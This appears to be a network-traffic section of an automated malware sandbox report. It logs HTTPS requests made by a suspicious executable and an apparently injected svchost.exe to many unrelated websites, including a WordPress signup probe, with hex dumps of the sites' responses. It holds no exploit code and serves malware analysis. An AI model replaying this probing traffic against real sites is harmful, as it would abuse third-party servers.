                                                                                                                                                                                                                                                                        Data Ascii: 0.4 0.8;0.2 0.8 0.4 0.8' calcMode='spline' /%3E %3C/path%3E %3Cpath transform='translate(14)' d='M0 12 V20 H4 V12z'%3E %3Canimate attributeName='d' values='M0 12 V20 H4 V12z; M0 4 V28 H4 V4z; M0 12 V20 H4 V12z; M0 12 V20 H4 V12z' dur='1.2s' repe
                                                                                                                                                                                                                                                                        2023-03-10 06:56:17 UTC933INData Raw: 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 72 65 76 73 6c 69 64 65 72 2f 70 75 62 6c 69 63 2f 61 73 73 65 74 73 2f 6a 73 2f 6a 71 75 65 72 79 2e 74 68 65 6d 65 70 75 6e 63 68 2e 72 65 76 6f 6c 75 74 69 6f 6e 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 35 2e 34 2e 38 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 76 61 72 20 77 63 5f 61 64 64 5f 74 6f 5f 63 61 72 74 5f 70 61 72 61 6d 73 3d 7b 22 61 6a 61 78 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f 61
                                                                                                                                                                                                                                                                        Data Ascii: ipt' src='https://dataform.co.uk/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.8'></script><script type='text/javascript'>//<![CDATA[var wc_add_to_cart_params={"ajax_url":"https:\/\/dataform.co.uk\/wp-admin\/a
                                                                                                                                                                                                                                                                        2023-03-10 06:56:17 UTC941INData Raw: 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 44 46 2d 69 63 6f 6e 2d 6c 6f 67 6f 2e 73 76 67 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 37 36 78 37 36 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 44 46 2d 69 63 6f 6e 2d 6c 6f 67 6f 2e 73 76 67 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 32 30 78 31 32 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b
                                                                                                                                                                                                                                                                        Data Ascii: ps://dataform.co.uk/wp-content/uploads/2023/01/DF-icon-logo.svg"><link rel="apple-touch-icon" sizes="76x76" href="https://dataform.co.uk/wp-content/uploads/2023/01/DF-icon-logo.svg"><link rel="apple-touch-icon" sizes="120x120" href="https://dataform.co.uk
                                                                                                                                                                                                                                                                        2023-03-10 06:56:17 UTC949INData Raw: 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 35 34 30 34 30 22 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 70 72 69 63 69 6e 67 2f 27 20 64 61 74 61 2d 6c 65 76 65 6c 3d 27 31 27 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 74 65 78 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 74 65 78 74 22 3e 50 72 69 63 69 6e 67 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74
                                                                                                                                                                                                                                                                        Data Ascii: menu-item-object-page menu-item-54040"><a href='https://dataform.co.uk/pricing/' data-level='1'><span class="menu-item-text"><span class="menu-text">Pricing</span></span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-it
                                                                                                                                                                                                                                                                        2023-03-10 06:56:17 UTC957INData Raw: 66 6f 72 6d 2d 37 5c 2f 76 31 22 7d 7d 3b 0a 2f 2f 5d 5d 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 2f 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 73 63 72 69 70 74 73 2e 6a 73 3f 76 65 72 3d 35 2e 31 2e 33 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 67 6f 5f 70 72 69 63 69 6e 67
                                                                                                                                                                                                                                                                        Data Ascii: form-7\/v1"}};//...</script><script type='text/javascript' src='https://dataform.co.uk/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.3'></script><script type='text/javascript' src='https://dataform.co.uk/wp-content/plugins/go_pricing


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        51192.168.2.655069188.114.96.3443C:\Users\user\Desktop\iJzpyjAehB.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC674OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: hyab.se
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC723INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:16 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Location: https://hyab.com
                                                                                                                                                                                                                                                                        Cache-Control: max-age=600
                                                                                                                                                                                                                                                                        Expires: Fri, 10 Mar 2023 07:06:16 GMT
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=J2bzrk5jV928u60v1GiZB%2BtB%2FVL4H3sj4fmQKz2phmj4sBTh34tF3khQ6JEn%2FQkmWqIwA5enoA4IVFlaQySTayOxUoAZtQ17rRrl8eqjO8DPQOrCAcQ8lbX1"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a8289f41bbda-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC724INData Raw: 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 79 61 62 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: c8<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://hyab.com">here</a>.</p></body></html>
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC724INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        52192.168.2.655219185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC752OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: techtrans.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC758INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:16 GMT
                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC758INData Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c
                                                                                                                                                                                                                                                                        Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        53192.168.2.655252185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC759OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: techtrans.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:17 UTC759INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:17 GMT
                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        2023-03-10 06:56:17 UTC760INData Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c
                                                                                                                                                                                                                                                                        Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        54192.168.2.65499949.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:17 UTC760OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: nts-web.net


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        55192.168.2.65530091.229.22.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:17 UTC760OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: pleszew.policja.gov.pl
                                                                                                                                                                                                                                                                        2023-03-10 06:56:17 UTC762INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:54 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        2023-03-10 06:56:17 UTC762INData Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65
                                                                                                                                                                                                                                                                        Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
                                                                                                                                                                                                                                                                        2023-03-10 06:56:17 UTC828INData Raw: 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 20 20 20 20 0d 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 21 2d 2d 20 20 74 6f 70 6e 65 77 73 2e 20 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 20 20 2d 2d 0d 0a 32 30 30 30 0d 0a 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 20 0d 0a 20 20 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 2d 6c 65 66 74 20 20 2d 2d 3e 0d 0a 20 20 3c 61 72 74 69 63 6c 65 20 69 64 3d 22 77 74 78 74 22 20 63 6c 61 73 73 3d 22 6d 61 69 6e 4c 65 66 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 20 61 6b 74 75 61 6c
                                                                                                                                                                                                                                                                        Data Ascii: </div> </div> </article> </section> </section></div>... topnews. -->... content --2000><div id="content"> ... content-left --> <article id="wtxt" class="mainLeft"> ... aktual
                                                                                                                                                                                                                                                                        2023-03-10 06:56:17 UTC844INData Raw: 74 3a 31 37 39 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2c 5a 6f 73 74 61 6e 2d 6a 65 64 6e 79 6d 2d 7a 2d 6e 61 73 2d 50 52 41 43 41 2d 57 2d 50 4f 4c 49 43 4a 49 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 74 6f 70 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2e 6a 70 67 3f 0d 0a 31 30 30 30 0d 0a 76 3d 31 36 35 37 31 31 32 36 31 38 22 20 61 6c 74 3d 22 5a 6f 73 74 61 c5 84 20 6a 65 64 6e 79 6d 20 7a 20 6e 61 73 20 2d 20 50 52 41 43 41 20 57 20 50 4f 4c 49 43 4a 49 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 74 65 6d 22
                                                                                                                                                                                                                                                                        Data Ascii: t:179px;margin-bottom:10px"><a href="/w20/batony/4596,Zostan-jednym-z-nas-PRACA-W-POLICJI.html" target="_top"><img src="/dokumenty/batony/4596.jpg?1000v=1657112618" alt="Zosta jednym z nas - PRACA W POLICJI" /></a></div><div class="item"
                                                                                                                                                                                                                                                                        2023-03-10 06:56:17 UTC860INData Raw: 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 66 6f 6f 74 65 72 3e 0d 0a 20 20 20 20 20 20 3c 21 2d 2d 20 66 6f 6f 74 65 72 20 2e 2d 2d 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 54 6f 54 6f 70 20 20 2d 2d 3e 0d 0a 20 20 09 3c 64 69 76 20 69 64 3d 22 62 61 63 6b 2d 74 6f 2d 74 6f 70 22 3e 3c 61 20 68 72 65 66 3d 22 23 70 61 67 65 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 0d 0a 61 34 0d 0a 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 50 6f 77 72 c3 b3 74 20 6e 61 20 67 c3 b3 72 c4 99 20 73 74 72 6f 6e 79 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0d 0a 20 20 09 3c 21 2d 2d 20 47 6f 54 6f 54 6f 70 20 20 2e 2d
                                                                                                                                                                                                                                                                        Data Ascii: div> </div> </footer> ... footer .--> </div> ... GoToTop --> <div id="back-to-top"><a href="#page"><span></span><span a4class="sr-only">Powrt na gr strony</span></a></div> ... GoToTop .-


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        56192.168.2.65532083.223.113.46443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:17 UTC761OUTGET /wp-signup.php?new=magicomm.co.uk HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: dataform.co.uk
                                                                                                                                                                                                                                                                        2023-03-10 06:56:18 UTC962INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Cache-Control: must-revalidate, no-cache, max-age=0
                                                                                                                                                                                                                                                                        Keep-Alive: timeout=2, max=100
                                                                                                                                                                                                                                                                        Content-Length: 48940
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: mobileappversionnumber, x-requested-with
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/7.0.29
                                                                                                                                                                                                                                                                        X-UA-Compatible: IE=EmulateIE10
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        X-Mod-Pagespeed: 1.9.32.14-0
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=10886400
                                                                                                                                                                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:17 GMT
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        2023-03-10 06:56:18 UTC963INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 36 29 20 7c 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 09 20 20 20 20 3c
                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html>...[if !(IE 6) | !(IE 7) | !(IE 8) ]>...><html lang="en-US" class="no-js">...<![endif]--><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0"> <
                                                                                                                                                                                                                                                                        2023-03-10 06:56:18 UTC965INData Raw: 6c 61 67 22 3a 72 65 74 75 72 6e 20 73 28 5b 35 35 33 35 36 2c 35 36 38 32 36 2c 35 35 33 35 36 2c 35 36 38 31 39 5d 2c 5b 35 35 33 35 36 2c 35 36 38 32 36 2c 38 32 30 33 2c 35 35 33 35 36 2c 35 36 38 31 39 5d 29 3f 21 31 3a 21 73 28 5b 35 35 33 35 36 2c 35 37 33 33 32 2c 35 36 31 32 38 2c 35 36 34 32 33 2c 35 36 31 32 38 2c 35 36 34 31 38 2c 35 36 31 32 38 2c 35 36 34 32 31 2c 35 36 31 32 38 2c 35 36 34 33 30 2c 35 36 31 32 38 2c 35 36 34 32 33 2c 35 36 31 32 38 2c 35 36 34 34 37 5d 2c 5b 35 35 33 35 36 2c 35 37 33 33 32 2c 38 32 30 33 2c 35 36 31 32 38 2c 35 36 34 32 33 2c 38 32 30 33 2c 35 36 31 32 38 2c 35 36 34 31 38 2c 38 32 30 33 2c 35 36 31 32 38 2c 35 36 34 32 31 2c 38 32 30 33 2c 35 36 31 32 38 2c 35 36 34 33 30 2c 38 32 30 33 2c 35 36 31 32 38
                                                                                                                                                                                                                                                                        Data Ascii: lag":return s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])?!1:!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128
